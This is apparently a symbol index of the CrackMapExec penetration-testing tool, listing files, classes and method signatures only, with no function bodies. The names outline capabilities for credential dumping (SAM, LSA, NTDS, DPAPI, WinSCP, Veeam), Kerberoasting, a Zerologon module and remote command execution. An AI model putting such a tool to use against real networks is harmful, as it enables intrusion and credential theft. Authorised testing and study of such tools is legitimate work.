method __init__ (line 16) | def __init__(self, context=None, module_options=None):
method options (line 21) | def options(self, context, module_options):
method on_admin_login (line 24) | def on_admin_login(self, context, connection):
FILE: cme/modules/user_desc.py
class CMEModule (line 10) | class CMEModule:
method __init__ (line 23) | def __init__(self, context=None, multiple_options=None):
method options (line 31) | def options(self, context, module_options):
method on_login (line 72) | def on_login(self, context, connection):
method create_log_file (line 94) | def create_log_file(self, host, time):
method delete_log_file (line 105) | def delete_log_file(self):
method append_to_log (line 116) | def append_to_log(self, user, description):
method process_record (line 123) | def process_record(self, item):
method highlight (line 159) | def highlight(self, description):
FILE: cme/modules/veeam_dump.py
class CMEModule (line 14) | class CMEModule:
method __init__ (line 25) | def __init__(self):
method options (line 31) | def options(self, context, module_options):
method checkVeeamInstalled (line 37) | def checkVeeamInstalled(self, context, connection):
method stripXmlOutput (line 127) | def stripXmlOutput(self, context, output):
method executePsMssql (line 130) | def executePsMssql(self, context, connection, SqlDatabase, SqlInstance...
method executePsPostgreSql (line 138) | def executePsPostgreSql(self, context, connection, PostgreSqlExec, Pos...
method printCreds (line 146) | def printCreds(self, context, output):
method on_admin_login (line 169) | def on_admin_login(self, context, connection):
FILE: cme/modules/wcc.py
class ConfigCheck (line 46) | class ConfigCheck:
method __init__ (line 53) | def __init__(self, name, description="", checkers=[None], checker_args...
method run (line 64) | def run(self):
method log (line 73) | def log(self, context):
class CMEModule (line 87) | class CMEModule:
method options (line 99) | def options(self, context, module_options):
method on_admin_login (line 115) | def on_admin_login(self, context, connection):
method on_shutdown (line 120) | def on_shutdown(self, context, connection):
method add_result (line 124) | def add_result(self, host, result):
method export_results (line 132) | def export_results(self):
class HostChecker (line 148) | class HostChecker:
method __init__ (line 151) | def __init__(self, context, connection):
method run (line 158) | def run(self):
method init_checks (line 168) | def init_checks(self):
method check_config (line 335) | def check_config(self):
method check_registry (line 356) | def check_registry(self, *specs, options={}):
method check_laps (line 440) | def check_laps(self):
method check_last_successful_update (line 504) | def check_last_successful_update(self):
method check_administrator_name (line 519) | def check_administrator_name(self):
method check_guest_account_disabled (line 526) | def check_guest_account_disabled(self):
method check_spooler_service (line 533) | def check_spooler_service(self):
method check_wsus_running (line 549) | def check_wsus_running(self):
method check_nbtns (line 559) | def check_nbtns(self):
method check_applocker (line 583) | def check_applocker(self):
method _open_root_key (line 599) | def _open_root_key(self, dce, connection, root_key):
method reg_get_subkeys (line 624) | def reg_get_subkeys(self, dce, connection, key_name):
method reg_query_value (line 653) | def reg_query_value(self, dce, connection, keyName, valueName=None):
method get_service (line 728) | def get_service(self, service_name, connection):
method get_user_info (line 744) | def get_user_info(self, connection, rid=501):
method ls (line 768) | def ls(self, smb, path='\\', share='C$'):
function le (line 782) | def le(reg_sz_string, number):
function in_ (line 785) | def in_(obj, seq):
function startswith (line 788) | def startswith(string, start):
function not_ (line 791) | def not_(boolean_operator):
FILE: cme/modules/wdigest.py
class CMEModule (line 9) | class CMEModule:
method options (line 17) | def options(self, context, module_options):
method on_admin_login (line 32) | def on_admin_login(self, context, connection):
method wdigest_enable (line 40) | def wdigest_enable(self, context, smbconnection):
method wdigest_disable (line 73) | def wdigest_disable(self, context, smbconnection):
method wdigest_check (line 119) | def wdigest_check(self, context, smbconnection):
FILE: cme/modules/web_delivery.py
class CMEModule (line 7) | class CMEModule:
method options (line 21) | def options(self, context, module_options):
method on_admin_login (line 40) | def on_admin_login(self, context, connection):
FILE: cme/modules/webdav.py
class CMEModule (line 10) | class CMEModule:
method options (line 24) | def options(self, context, module_options):
method on_login (line 33) | def on_login(self, context, connection):
FILE: cme/modules/whoami.py
class CMEModule (line 1) | class CMEModule:
method options (line 13) | def options(self, context, module_options):
method on_login (line 21) | def on_login(self, context, connection):
FILE: cme/modules/winscp_dump.py
class CMEModule (line 20) | class CMEModule:
method options (line 31) | def options(self, context, module_options):
method printCreds (line 52) | def printCreds(self, context, session):
method userObjectToNameMapper (line 61) | def userObjectToNameMapper(self, context, connection, allUserObjects):
method decryptPasswd (line 84) | def decryptPasswd(self, host: str, username: str, password: str) -> str:
method dec_next_char (line 114) | def dec_next_char(self, passBytes) -> "Tuple[int, bytes]":
method registrySessionExtractor (line 130) | def registrySessionExtractor(self, context, connection, userObject, se...
method findAllLoggedInUsersInRegistry (line 171) | def findAllLoggedInUsersInRegistry(self, context, connection):
method findAllUsers (line 208) | def findAllUsers(self, context, connection):
method loadMissingUsers (line 243) | def loadMissingUsers(self, context, connection, unloadedUserObjects):
method unloadMissingUsers (line 284) | def unloadMissingUsers(self, context, connection, unloadedUserObjects):
method checkMasterpasswordSet (line 310) | def checkMasterpasswordSet(self, connection, userObject):
method registryDiscover (line 331) | def registryDiscover(self, context, connection):
method decodeConfigFile (line 396) | def decodeConfigFile(self, context, confFile):
method getConfigFile (line 417) | def getConfigFile(self, context, connection):
method on_admin_login (line 457) | def on_admin_login(self, context, connection):
FILE: cme/modules/wireless.py
class CMEModule (line 12) | class CMEModule:
method options (line 19) | def options(self, context, module_options):
method on_admin_login (line 22) | def on_admin_login(self, context, connection):
FILE: cme/modules/zerologon.py
class CMEModule (line 15) | class CMEModule:
method __init__ (line 22) | def __init__(self, context=None, module_options=None):
method options (line 26) | def options(self, context, module_options):
method on_login (line 29) | def on_login(self, context, connection):
method perform_attack (line 48) | def perform_attack(self, dc_handle, dc_ip, target_computer):
function fail (line 66) | def fail(msg):
function try_zero_authenticate (line 71) | def try_zero_authenticate(rpc_con, dc_handle, dc_ip, target_computer):
FILE: cme/parsers/ip.py
function parse_targets (line 7) | def parse_targets(target):
FILE: cme/parsers/nessus.py
function parse_nessus_file (line 16) | def parse_nessus_file(nessus_file, protocol):
FILE: cme/parsers/nmap.py
function parse_nmap_xml (line 44) | def parse_nmap_xml(nmap_output_file, protocol):
FILE: cme/protocols/ftp.py
class ftp (line 9) | class ftp(connection):
method __init__ (line 10) | def __init__(self, args, db, host):
method proto_logger (line 16) | def proto_logger(self):
method proto_flow (line 26) | def proto_flow(self):
method enum_host_info (line 34) | def enum_host_info(self):
method print_host_info (line 41) | def print_host_info(self):
method create_conn_obj (line 45) | def create_conn_obj(self):
method plaintext_login (line 61) | def plaintext_login(self, username, password):
method list_directory_full (line 100) | def list_directory_full(self):
method supported_commands (line 107) | def supported_commands(self):
FILE: cme/protocols/ftp/database.py
class database (line 16) | class database:
method __init__ (line 17) | def __init__(self, db_engine):
method db_schema (line 33) | def db_schema(db_conn):
method reflect_tables (line 60) | def reflect_tables(self):
method shutdown_db (line 85) | def shutdown_db(self):
method clear_database (line 94) | def clear_database(self):
method add_host (line 98) | def add_host(self, host, port, banner):
method add_credential (line 149) | def add_credential(self, username, password):
method remove_credentials (line 201) | def remove_credentials(self, creds_id):
method is_credential_valid (line 211) | def is_credential_valid(self, credential_id):
method get_credential (line 222) | def get_credential(self, username, password):
method get_credentials (line 233) | def get_credentials(self, filter_term=None):
method is_host_valid (line 251) | def is_host_valid(self, host_id):
method get_hosts (line 259) | def get_hosts(self, filter_term=None):
method is_user_valid (line 279) | def is_user_valid(self, cred_id):
method get_user (line 287) | def get_user(self, username):
method get_users (line 292) | def get_users(self, filter_term=None):
method add_loggedin_relation (line 304) | def add_loggedin_relation(self, cred_id, host_id):
method get_loggedin_relations (line 329) | def get_loggedin_relations(self, cred_id=None, host_id=None):
method remove_loggedin_relations (line 338) | def remove_loggedin_relations(self, cred_id=None, host_id=None):
method add_directory_listing (line 346) | def add_directory_listing(self, lir_id, data):
method get_directory_listing (line 349) | def get_directory_listing(self):
method remove_directory_listing (line 352) | def remove_directory_listing(self):
FILE: cme/protocols/ftp/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method display_creds (line 8) | def display_creds(self, creds):
method display_hosts (line 26) | def display_hosts(self, hosts):
method do_hosts (line 46) | def do_hosts(self, line):
method help_hosts (line 91) | def help_hosts(self):
method do_creds (line 100) | def do_creds(self, line):
method help_creds (line 156) | def help_creds(self):
method do_clear_database (line 173) | def do_clear_database(self, line):
method help_clear_database (line 178) | def help_clear_database(self):
FILE: cme/protocols/ftp/proto_args.py
function proto_args (line 1) | def proto_args(parser, std_parser, module_parser):
FILE: cme/protocols/ldap.py
function resolve_collection_methods (line 60) | def resolve_collection_methods(methods):
class ldap (line 132) | class ldap(connection):
method __init__ (line 133) | def __init__(self, args, db, host):
method proto_logger (line 155) | def proto_logger(self):
method get_ldap_info (line 166) | def get_ldap_info(self, host):
method get_os_arch (line 215) | def get_os_arch(self):
method get_ldap_username (line 241) | def get_ldap_username(self):
method enum_host_info (line 255) | def enum_host_info(self):
method print_host_info (line 299) | def print_host_info(self):
method kerberos_login (line 316) | def kerberos_login(
method plaintext_login (line 472) | def plaintext_login(self, domain, username, password):
method hash_login (line 547) | def hash_login(self, domain, username, ntlm_hash):
method create_smbv1_conn (line 636) | def create_smbv1_conn(self):
method create_smbv3_conn (line 652) | def create_smbv3_conn(self):
method create_conn_obj (line 667) | def create_conn_obj(self):
method get_sid (line 677) | def get_sid(self):
method sid_to_str (line 680) | def sid_to_str(self, sid):
method check_if_admin (line 700) | def check_if_admin(self):
method getUnixTime (line 735) | def getUnixTime(self, t):
method search (line 740) | def search(self, searchFilter, attributes, sizeLimit=0):
method users (line 765) | def users(self):
method groups (line 803) | def groups(self):
method dc_list (line 827) | def dc_list(self):
method asreproast (line 851) | def asreproast(self):
method kerberoasting (line 925) | def kerberoasting(self):
method trusted_for_delegation (line 1048) | def trusted_for_delegation(self):
method password_not_required (line 1113) | def password_not_required(self):
method admin_count (line 1195) | def admin_count(self):
method gmsa (line 1259) | def gmsa(self):
method decipher_gmsa_name (line 1295) | def decipher_gmsa_name(self, domain_name=None, account_name=None):
method gmsa_convert_id (line 1309) | def gmsa_convert_id(self):
method gmsa_decrypt_lsa (line 1339) | def gmsa_decrypt_lsa(self):
method bloodhound (line 1379) | def bloodhound(self):
FILE: cme/protocols/ldap/bloodhound.py
class BloodHound (line 10) | class BloodHound(object):
method __init__ (line 11) | def __init__(self, ad, hostname, host, port):
method proto_logger (line 20) | def proto_logger(self, port, hostname, host):
method connect (line 23) | def connect(self):
method run (line 48) | def run(
FILE: cme/protocols/ldap/database.py
class database (line 15) | class database:
method __init__ (line 16) | def __init__(self, db_engine):
method db_schema (line 32) | def db_schema(db_conn):
method reflect_tables (line 50) | def reflect_tables(self):
method shutdown_db (line 65) | def shutdown_db(self):
method clear_database (line 74) | def clear_database(self):
FILE: cme/protocols/ldap/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method do_clear_database (line 8) | def do_clear_database(self, line):
method help_clear_database (line 12) | def help_clear_database(self):
FILE: cme/protocols/ldap/gmsa.py
class MSDS_MANAGEDPASSWORD_BLOB (line 4) | class MSDS_MANAGEDPASSWORD_BLOB(Structure):
method __init__ (line 20) | def __init__(self, data=None):
method fromString (line 23) | def fromString(self, data):
FILE: cme/protocols/ldap/kerberos.py
class KerberosAttacks (line 29) | class KerberosAttacks:
method __init__ (line 30) | def __init__(self, connection):
method outputTGS (line 51) | def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=...
method getTGT_kerberoasting (line 109) | def getTGT_kerberoasting(self):
method getTGT_asroast (line 177) | def getTGT_asroast(self, userName, requestPAC=True):
FILE: cme/protocols/ldap/laps.py
class LDAPConnect (line 32) | class LDAPConnect:
method __init__ (line 33) | def __init__(self, host, port, hostname):
method proto_logger (line 37) | def proto_logger(self, host, port, hostname):
method kerberos_login (line 40) | def kerberos_login(self, domain, username, password="", ntlm_hash="", ...
method auth_login (line 121) | def auth_login(self, domain, username, password, ntlm_hash):
class LAPSv2Extract (line 179) | class LAPSv2Extract:
method __init__ (line 180) | def __init__(self, data, username, password, domain, ntlm_hash, do_ker...
method proto_logger (line 196) | def proto_logger(self, host, port, hostname):
method run (line 199) | def run(self):
FILE: cme/protocols/ldap/proto_args.py
function proto_args (line 3) | def proto_args(parser, std_parser, module_parser):
function get_conditional_action (line 39) | def get_conditional_action(baseAction):
FILE: cme/protocols/mssql.py
class mssql (line 30) | class mssql(connection):
method __init__ (line 31) | def __init__(self, args, db, host):
method proto_flow (line 41) | def proto_flow(self):
method proto_logger (line 52) | def proto_logger(self):
method enum_host_info (line 62) | def enum_host_info(self):
method print_host_info (line 113) | def print_host_info(self):
method create_conn_obj (line 122) | def create_conn_obj(self):
method check_if_admin (line 131) | def check_if_admin(self):
method kerberos_login (line 146) | def kerberos_login(
method plaintext_login (line 216) | def plaintext_login(self, domain, username, password):
method hash_login (line 255) | def hash_login(self, domain, username, ntlm_hash):
method mssql_query (line 305) | def mssql_query(self):
method execute (line 331) | def execute(self, payload=None, print_output=False):
method ps_execute (line 359) | def ps_execute(
method put_file (line 377) | def put_file(self):
method get_file (line 393) | def get_file(self):
method handle_mssql_reply (line 409) | def handle_mssql_reply(self):
FILE: cme/protocols/mssql/database.py
class database (line 21) | class database:
method __init__ (line 22) | def __init__(self, db_engine):
method db_schema (line 39) | def db_schema(db_conn):
method reflect_tables (line 73) | def reflect_tables(self):
method shutdown_db (line 89) | def shutdown_db(self):
method clear_database (line 98) | def clear_database(self):
method add_host (line 102) | def add_host(self, ip, hostname, domain, os, instances):
method add_credential (line 150) | def add_credential(self, credtype, domain, username, password, pillage...
method remove_credentials (line 196) | def remove_credentials(self, creds_id):
method add_admin_user (line 206) | def add_admin_user(self, credtype, domain, username, password, host, u...
method get_admin_relations (line 241) | def get_admin_relations(self, user_id=None, host_id=None):
method remove_admin_relation (line 252) | def remove_admin_relation(self, user_ids=None, host_ids=None):
method is_credential_valid (line 262) | def is_credential_valid(self, credential_id):
method get_credentials (line 273) | def get_credentials(self, filter_term=None, cred_type=None):
method is_host_valid (line 293) | def is_host_valid(self, host_id):
method get_hosts (line 301) | def get_hosts(self, filter_term=None, domain=None):
FILE: cme/protocols/mssql/db_navigator.py
class navigator (line 8) | class navigator(DatabaseNavigator):
method display_creds (line 9) | def display_creds(self, creds):
method display_hosts (line 26) | def display_hosts(self, hosts):
method do_hosts (line 43) | def do_hosts(self, line):
method do_creds (line 76) | def do_creds(self, line):
method do_clear_database (line 132) | def do_clear_database(self, line):
method help_clear_database (line 137) | def help_clear_database():
method complete_hosts (line 145) | def complete_hosts(self, text, line):
method complete_creds (line 154) | def complete_creds(self, text, line):
FILE: cme/protocols/mssql/mssqlexec.py
class MSSQLEXEC (line 8) | class MSSQLEXEC:
method __init__ (line 9) | def __init__(self, connection):
method execute (line 13) | def execute(self, command, output=False):
method enable_xp_cmdshell (line 46) | def enable_xp_cmdshell(self):
method disable_xp_cmdshell (line 49) | def disable_xp_cmdshell(self):
method enable_ole (line 52) | def enable_ole(self):
method disable_ole (line 55) | def disable_ole(self):
method put_file (line 58) | def put_file(self, data, remote):
method file_exists (line 67) | def file_exists(self, remote):
method get_file (line 74) | def get_file(self, remote, local):
FILE: cme/protocols/mssql/proto_args.py
function proto_args (line 3) | def proto_args(parser, std_parser, module_parser):
function get_conditional_action (line 32) | def get_conditional_action(baseAction):
FILE: cme/protocols/rdp.py
class rdp (line 28) | class rdp(connection):
method __init__ (line 29) | def __init__(self, args, db, host):
method proto_logger (line 96) | def proto_logger(self):
method print_host_info (line 106) | def print_host_info(self):
method create_conn_obj (line 114) | def create_conn_obj(self):
method check_nla (line 165) | def check_nla(self):
method connect_rdp (line 181) | async def connect_rdp(self):
method kerberos_login (line 186) | def kerberos_login(self, domain, username, password="", ntlm_hash="", ...
method plaintext_login (line 287) | def plaintext_login(self, domain, username, password):
method hash_login (line 319) | def hash_login(self, domain, username, ntlm_hash):
method screen (line 352) | async def screen(self):
method screenshot (line 366) | def screenshot(self):
method nla_screen (line 369) | async def nla_screen(self):
method nla_screenshot (line 383) | def nla_screenshot(self):
FILE: cme/protocols/rdp/database.py
class database (line 15) | class database:
method __init__ (line 16) | def __init__(self, db_engine):
method db_schema (line 32) | def db_schema(db_conn):
method reflect_tables (line 52) | def reflect_tables(self):
method shutdown_db (line 67) | def shutdown_db(self):
method clear_database (line 76) | def clear_database(self):
FILE: cme/protocols/rdp/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method do_clear_database (line 8) | def do_clear_database(self, line):
method help_clear_database (line 12) | def help_clear_database(self):
FILE: cme/protocols/rdp/proto_args.py
function proto_args (line 1) | def proto_args(parser, std_parser, module_parser):
FILE: cme/protocols/smb.py
function get_error_string (line 89) | def get_error_string(exception):
function requires_smb_server (line 103) | def requires_smb_server(func):
class smb (line 154) | class smb(connection):
method __init__ (line 155) | def __init__(self, args, db, host):
method proto_logger (line 175) | def proto_logger(self):
method get_os_arch (line 185) | def get_os_arch(self):
method enum_host_info (line 211) | def enum_host_info(self):
method laps_search (line 265) | def laps_search(self, username, password, ntlm_hash, domain):
method print_host_info (line 364) | def print_host_info(self):
method kerberos_login (line 372) | def kerberos_login(self, domain, username, password="", ntlm_hash="", ...
method plaintext_login (line 457) | def plaintext_login(self, domain, username, password):
method hash_login (line 517) | def hash_login(self, domain, username, ntlm_hash):
method create_smbv1_conn (line 583) | def create_smbv1_conn(self, kdc=""):
method create_smbv3_conn (line 604) | def create_smbv3_conn(self, kdc=""):
method create_conn_obj (line 627) | def create_conn_obj(self, kdc=""):
method check_if_admin (line 634) | def check_if_admin(self):
method gen_relay_list (line 656) | def gen_relay_list(self):
method execute (line 665) | def execute(self, payload=None, get_output=False, methods=None):
method ps_execute (line 797) | def ps_execute(
method shares (line 842) | def shares(self):
method get_dc_ips (line 921) | def get_dc_ips(self):
method sessions (line 929) | def sessions(self):
method disks (line 947) | def disks(self):
method local_groups (line 970) | def local_groups(self):
method domainfromdsn (line 1043) | def domainfromdsn(self, dsn):
method domainfromdnshostname (line 1055) | def domainfromdnshostname(self, dns):
method groups (line 1060) | def groups(self):
method users (line 1155) | def users(self):
method hosts (line 1160) | def hosts(self):
method loggedon_users (line 1186) | def loggedon_users(self):
method pass_pol (line 1209) | def pass_pol(self):
method wmi (line 1213) | def wmi(self, wmi_query=None, namespace=None):
method spider (line 1270) | def spider(
method rid_brute (line 1303) | def rid_brute(self, max_rid=None):
method put_file (line 1407) | def put_file(self):
method get_file (line 1416) | def get_file(self):
method enable_remoteops (line 1432) | def enable_remoteops(self):
method sam (line 1443) | def sam(self):
method dpapi (line 1488) | def dpapi(self):
method lsa (line 1699) | def lsa(self):
method ntds (line 1745) | def ntds(self):
FILE: cme/protocols/smb/atexec.py
class TSCH_EXEC (line 12) | class TSCH_EXEC:
method __init__ (line 13) | def __init__(
method execute (line 68) | def execute(self, command, output=False):
method output_callback (line 73) | def output_callback(self, data):
method gen_xml (line 76) | def gen_xml(self, command, tmpFileName, fileless=False):
method execute_handler (line 136) | def execute_handler(self, command, fileless=False):
FILE: cme/protocols/smb/database.py
class database (line 24) | class database:
method __init__ (line 25) | def __init__(self, db_engine):
method db_schema (line 50) | def db_schema(db_conn):
method reflect_tables (line 179) | def reflect_tables(self):
method shutdown_db (line 203) | def shutdown_db(self):
method clear_database (line 212) | def clear_database(self):
method add_host (line 217) | def add_host(
method add_credential (line 296) | def add_credential(self, credtype, domain, username, password, group_i...
method remove_credentials (line 362) | def remove_credentials(self, creds_id):
method add_admin_user (line 372) | def add_admin_user(self, credtype, domain, username, password, host, u...
method get_admin_relations (line 407) | def get_admin_relations(self, user_id=None, host_id=None):
method remove_admin_relation (line 418) | def remove_admin_relation(self, user_ids=None, host_ids=None):
method is_credential_valid (line 428) | def is_credential_valid(self, credential_id):
method get_credentials (line 439) | def get_credentials(self, filter_term=None, cred_type=None):
method get_credential (line 459) | def get_credential(self, cred_type, domain, username, password):
method is_credential_local (line 470) | def is_credential_local(self, credential_id):
method is_host_valid (line 480) | def is_host_valid(self, host_id):
method get_hosts (line 488) | def get_hosts(self, filter_term=None, domain=None):
method is_group_valid (line 526) | def is_group_valid(self, group_id):
method add_group (line 538) | def add_group(self, domain, name, rid=None, member_count_ad=None):
method get_groups (line 605) | def get_groups(self, filter_term=None, group_name=None, group_domain=N...
method get_group_relations (line 631) | def get_group_relations(self, user_id=None, group_id=None):
method remove_group_relations (line 645) | def remove_group_relations(self, user_id=None, group_id=None):
method is_user_valid (line 653) | def is_user_valid(self, user_id):
method get_users (line 661) | def get_users(self, filter_term=None):
method get_user (line 673) | def get_user(self, domain, username):
method get_domain_controllers (line 681) | def get_domain_controllers(self, domain=None):
method is_share_valid (line 684) | def is_share_valid(self, share_id):
method add_share (line 694) | def add_share(self, host_id, user_id, name, remark, read, write):
method get_shares (line 709) | def get_shares(self, filter_term=None):
method get_shares_by_access (line 720) | def get_shares_by_access(self, permissions, share_id=None):
method get_users_with_share_access (line 732) | def get_users_with_share_access(self, host_id, share_name, permissions):
method add_domain_backupkey (line 743) | def add_domain_backupkey(self, domain: str, pvk: bytes):
method get_domain_backupkey (line 765) | def get_domain_backupkey(self, domain: str = None):
method is_dpapi_secret_valid (line 781) | def is_dpapi_secret_valid(self, dpapi_secret_id):
method add_dpapi_secrets (line 792) | def add_dpapi_secrets(
method get_dpapi_secrets (line 821) | def get_dpapi_secrets(
method add_loggedin_relation (line 860) | def add_loggedin_relation(self, user_id, host_id):
method get_loggedin_relations (line 882) | def get_loggedin_relations(self, user_id=None, host_id=None):
method remove_loggedin_relations (line 891) | def remove_loggedin_relations(self, user_id=None, host_id=None):
method get_checks (line 899) | def get_checks(self):
method get_check_results (line 903) | def get_check_results(self):
method insert_data (line 907) | def insert_data(self, table, select_results=[], **new_row):
method add_check (line 939) | def add_check(self, name, description):
method add_check_result (line 953) | def add_check_result(self, host_id, check_id, secure, reasons):
FILE: cme/protocols/smb/db_navigator.py
class navigator (line 12) | class navigator(DatabaseNavigator):
method display_creds (line 13) | def display_creds(self, creds):
method display_groups (line 37) | def display_groups(self, groups):
method display_hosts (line 62) | def display_hosts(self, hosts):
method display_shares (line 122) | def display_shares(self, shares):
method do_shares (line 145) | def do_shares(self, line):
method help_shares (line 199) | def help_shares(self):
method do_groups (line 207) | def do_groups(self, line):
method help_groups (line 266) | def help_groups(self):
method do_hosts (line 274) | def do_hosts(self, line):
method do_wcc (line 363) | def do_wcc(self, line):
method display_wcc_results (line 384) | def display_wcc_results(self, results, columns_to_display=None):
method help_wcc (line 424) | def help_wcc(self):
method help_hosts (line 441) | def help_hosts(self):
method do_dpapi (line 460) | def do_dpapi(self, line):
method help_dpapi (line 594) | def help_dpapi(self):
method do_creds (line 611) | def do_creds(self, line):
method help_creds (line 696) | def help_creds(self):
method do_clear_database (line 716) | def do_clear_database(self, line):
method help_clear_database (line 720) | def help_clear_database(self):
method complete_hosts (line 728) | def complete_hosts(self, text, line):
method complete_creds (line 738) | def complete_creds(self, text, line):
FILE: cme/protocols/smb/firefox.py
class FirefoxData (line 17) | class FirefoxData:
method __init__ (line 18) | def __init__(self, winuser: str, url: str, username: str, password: str):
class FirefoxTriage (line 25) | class FirefoxTriage:
method __init__ (line 44) | def __init__(self, target, logger, conn: DPLootSMBConnection = None):
method upgrade_connection (line 49) | def upgrade_connection(self, connection=None):
method run (line 56) | def run(self):
method get_login_data (line 111) | def get_login_data(self, logins_data):
method get_key (line 125) | def get_key(self, key4_data, master_password=b""):
method is_master_password_correct (line 156) | def is_master_password_correct(self, key_data, master_password=b""):
method get_users (line 170) | def get_users(self):
method decode_login_data (line 182) | def decode_login_data(data):
method decrypt (line 191) | def decrypt(key, iv, ciphertext):
method decrypt_3des (line 204) | def decrypt_3des(decoded_item, master_password, global_salt):
FILE: cme/protocols/smb/mmcexec.py
class MMCEXEC (line 62) | class MMCEXEC:
method __init__ (line 63) | def __init__(self, host, share_name, username, password, domain, smbco...
method getInterface (line 139) | def getInterface(self, interface, resp):
method execute (line 166) | def execute(self, command, output=False):
method exit (line 173) | def exit(self):
method execute_remote (line 186) | def execute_remote(self, data):
method output_callback (line 228) | def output_callback(self, data):
method get_output_fileless (line 231) | def get_output_fileless(self):
method get_output_remote (line 243) | def get_output_remote(self):
FILE: cme/protocols/smb/passpol.py
function d2b (line 11) | def d2b(a):
function convert (line 24) | def convert(low, high, lockout=False):
class PassPolDump (line 67) | class PassPolDump:
method __init__ (line 73) | def __init__(self, connection):
method dump (line 97) | def dump(self):
method fetchList (line 129) | def fetchList(self, rpctransport):
method pretty_print (line 219) | def pretty_print(self):
FILE: cme/protocols/smb/proto_args.py
function proto_args (line 1) | def proto_args(parser, std_parser, module_parser):
FILE: cme/protocols/smb/remotefile.py
class RemoteFile (line 6) | class RemoteFile:
method __init__ (line 7) | def __init__(
method open (line 22) | def open(self):
method seek (line 25) | def seek(self, offset, whence):
method read (line 30) | def read(self, bytesToRead):
method close (line 37) | def close(self):
method delete (line 42) | def delete(self):
method tell (line 45) | def tell(self):
method __str__ (line 48) | def __str__(self):
FILE: cme/protocols/smb/samrfunc.py
class SamrFunc (line 17) | class SamrFunc:
method __init__ (line 18) | def __init__(self, connection):
method get_builtin_groups (line 60) | def get_builtin_groups(self):
method get_custom_groups (line 72) | def get_custom_groups(self):
method get_local_groups (line 83) | def get_local_groups(self):
method get_local_users (line 88) | def get_local_users(self):
method get_local_administrators (line 91) | def get_local_administrators(self):
class SAMRQuery (line 104) | class SAMRQuery:
method __init__ (line 105) | def __init__(
method get_transport (line 129) | def get_transport(self):
method get_dce (line 147) | def get_dce(self):
method get_server_handle (line 161) | def get_server_handle(self):
method get_domains (line 173) | def get_domains(self):
method get_domain_handle (line 181) | def get_domain_handle(self, domain_name):
method get_domain_aliases (line 186) | def get_domain_aliases(self, domain_handle):
method get_alias_handle (line 193) | def get_alias_handle(self, domain_handle, alias_id):
method get_alias_members (line 197) | def get_alias_members(self, domain_handle, alias_id):
class LSAQuery (line 206) | class LSAQuery:
method __init__ (line 207) | def __init__(
method get_transport (line 233) | def get_transport(self):
method get_dce (line 252) | def get_dce(self):
method get_policy_handle (line 265) | def get_policy_handle(self):
method lookup_sids (line 269) | def lookup_sids(self, sids):
FILE: cme/protocols/smb/samruser.py
class UserSamrDump (line 11) | class UserSamrDump:
method __init__ (line 17) | def __init__(self, connection):
method dump (line 41) | def dump(self):
method fetchList (line 69) | def fetchList(self, rpctransport):
FILE: cme/protocols/smb/smbexec.py
class SMBEXEC (line 12) | class SMBEXEC:
method __init__ (line 13) | def __init__(
method execute (line 98) | def execute(self, command, output=False):
method output_callback (line 109) | def output_callback(self, data):
method execute_remote (line 112) | def execute_remote(self, data):
method get_output_remote (line 161) | def get_output_remote(self):
method execute_fileless (line 189) | def execute_fileless(self, data):
method get_output_fileless (line 228) | def get_output_fileless(self):
method finish (line 240) | def finish(self):
FILE: cme/protocols/smb/smbspider.py
class SMBSpider (line 12) | class SMBSpider:
method __init__ (line 13) | def __init__(self, smbconnection, logger):
method spider (line 25) | def spider(
method _spider (line 71) | def _spider(self, subfolder, depth):
method dir_list (line 116) | def dir_list(self, files, path):
method search_content (line 160) | def search_content(self, path, result):
method get_lastm_time (line 226) | def get_lastm_time(self, result_obj):
FILE: cme/protocols/smb/wmiexec.py
class WMIEXEC (line 15) | class WMIEXEC:
method __init__ (line 16) | def __init__(
method execute (line 92) | def execute(self, command, output=False):
method cd (line 105) | def cd(self, s):
method output_callback (line 115) | def output_callback(self, data):
method execute_handler (line 118) | def execute_handler(self, data):
method execute_remote (line 126) | def execute_remote(self, data):
method execute_fileless (line 137) | def execute_fileless(self, data):
method get_output_fileless (line 147) | def get_output_fileless(self):
method get_output_remote (line 156) | def get_output_remote(self):
FILE: cme/protocols/ssh.py
class ssh (line 19) | class ssh(connection):
method __init__ (line 20) | def __init__(self, args, db, host):
method proto_logger (line 26) | def proto_logger(self):
method print_host_info (line 37) | def print_host_info(self):
method enum_host_info (line 41) | def enum_host_info(self):
method create_conn_obj (line 51) | def create_conn_obj(self):
method client_close (line 66) | def client_close(self):
method check_if_admin (line 69) | def check_if_admin(self):
method plaintext_login (line 83) | def plaintext_login(self, username, password, private_key=None):
method execute (line 176) | def execute(self, payload=None, output=False):
FILE: cme/protocols/ssh/database.py
class database (line 25) | class database:
method __init__ (line 26) | def __init__(self, db_engine):
method db_schema (line 44) | def db_schema(db_conn):
method reflect_tables (line 81) | def reflect_tables(self):
method shutdown_db (line 99) | def shutdown_db(self):
method clear_database (line 108) | def clear_database(self):
method add_host (line 112) | def add_host(self, host, port, banner, os=None):
method add_credential (line 164) | def add_credential(self, credtype, username, password, key=None):
method remove_credentials (line 231) | def remove_credentials(self, creds_id):
method add_key (line 241) | def add_key(self, cred_id, key):
method get_keys (line 255) | def get_keys(self, key_id=None, cred_id=None):
method add_admin_user (line 264) | def add_admin_user(self, credtype, username, secret, host_id=None, cre...
method get_admin_relations (line 298) | def get_admin_relations(self, cred_id=None, host_id=None):
method remove_admin_relation (line 309) | def remove_admin_relation(self, cred_ids=None, host_ids=None):
method is_credential_valid (line 319) | def is_credential_valid(self, credential_id):
method get_credentials (line 330) | def get_credentials(self, filter_term=None, cred_type=None):
method get_credential (line 350) | def get_credential(self, cred_type, username, password):
method is_host_valid (line 362) | def is_host_valid(self, host_id):
method get_hosts (line 370) | def get_hosts(self, filter_term=None):
method is_user_valid (line 390) | def is_user_valid(self, cred_id):
method get_users (line 398) | def get_users(self, filter_term=None):
method get_user (line 410) | def get_user(self, domain, username):
method add_loggedin_relation (line 415) | def add_loggedin_relation(self, cred_id, host_id, shell=False):
method get_loggedin_relations (line 437) | def get_loggedin_relations(self, cred_id=None, host_id=None, shell=None):
method remove_loggedin_relations (line 448) | def remove_loggedin_relations(self, cred_id=None, host_id=None):
FILE: cme/protocols/ssh/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method display_creds (line 8) | def display_creds(self, creds):
method display_hosts (line 45) | def display_hosts(self, hosts):
method do_hosts (line 70) | def do_hosts(self, line):
method help_hosts (line 140) | def help_hosts(self):
